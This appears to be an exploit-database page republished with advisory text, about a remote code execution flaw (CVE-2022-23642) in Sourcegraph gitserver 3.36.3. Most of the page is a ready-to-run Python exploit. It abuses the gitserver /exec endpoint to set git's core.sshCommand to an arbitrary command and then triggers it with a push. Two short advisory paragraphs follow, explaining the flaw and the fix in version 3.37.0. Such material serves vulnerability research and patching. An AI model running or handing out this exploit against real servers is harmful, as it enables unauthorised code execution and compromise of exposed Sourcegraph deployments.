Headline
Sourcegraph Gitserver 3.36.3 Remote Code Execution
Sourcegraph Gitserver version 3.36.3 suffers from a remote code execution vulnerability.
# Exploit Title: Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE)# Date: 2022-06-10# Exploit Author: Altelus# Vendor Homepage: https://about.sourcegraph.com/# Version: 3.63.3 # Tested on: Linux# CVE : CVE-2022-23642# Docker Container: sourcegraph/server:3.36.3# Sourcegraph prior to 3.37.0 has a remote code execution vulnerability on its gitserver service. # This is due to lack of restriction on git config execution thus "core.sshCommand" can be passed # on the HTTP arguments which can contain arbitrary bash commands. Note that this is only possible # if gitserver is exposed to the attacker. This is tested on Sourcegraph 3.36.3## Exploitation parameters:# - Exposed Sourcegraph gitserver# - Existing repo on sourcegraphimport jsonimport argparseimport requestsdef exploit(host, existing_git, cmd): # setting sshCommand data = { "Repo" : existing_git, "Args" : [ "config", "core.sshCommand", cmd ] } res = requests.get(host+"/exec", json=data).text if len(res) > 0: print("[-] Didn't work: {}".format(res)) exit(0) # setting fake origin data = { "Repo" : existing_git, "Args" : [ "remote", "add", "origin", "git@lolololz:foo/bar.git" ] } res = requests.get(host+"/exec", json=data).text if len(res) > 0: print("[-] Didn't work: {}".format(res)) exit(0) # triggering command using push data = { "Repo" : existing_git, "Args" : [ "push", "origin", "master" ] } res = requests.get(host+"/exec", json=data).text print("[*] Finished executing exploit")parser = argparse.ArgumentParser()parser.add_argument('--gitserver-host', required=True, help="Target Sourcegraph Gitserver Host")parser.add_argument('--existing-git', required=True, help="e.g. Link of existing repository in target Sourcegraph")parser.add_argument('--cmd', required=True, help="Command to run")args = parser.parse_args()host = args.gitserver_hostexisting_git = args.existing_gitcmd = args.cmdexploit(host, existing_git, cmd)Related news
A vulnerability exists within Sourcegraph's gitserver component that allows a remote attacker to execute arbitrary OS commands by modifying the core.sshCommand value within the git configuration. This command can then be triggered on demand by executing a git push operation. The vulnerability was patched by introducing a feature flag in version 3.37.0. This flag must be enabled for the protections to be in place which filter the commands that are able to be executed through the git exec REST API.
Sourcegraph is a code search and navigation engine. Sourcegraph prior to version 3.37 is vulnerable to remote code execution in the `gitserver` service. The service acts as a git exec proxy, and fails to properly restrict calling `git config`. This allows an attacker to set the git `core.sshCommand` option, which sets git to use the specified command instead of ssh when they need to connect to a remote system. Exploitation of this vulnerability depends on how Sourcegraph is deployed. An attacker able to make HTTP requests to internal services like gitserver is able to exploit it. This issue is patched in Sourcegraph version 3.37. As a workaround, ensure that requests to gitserver are properly protected.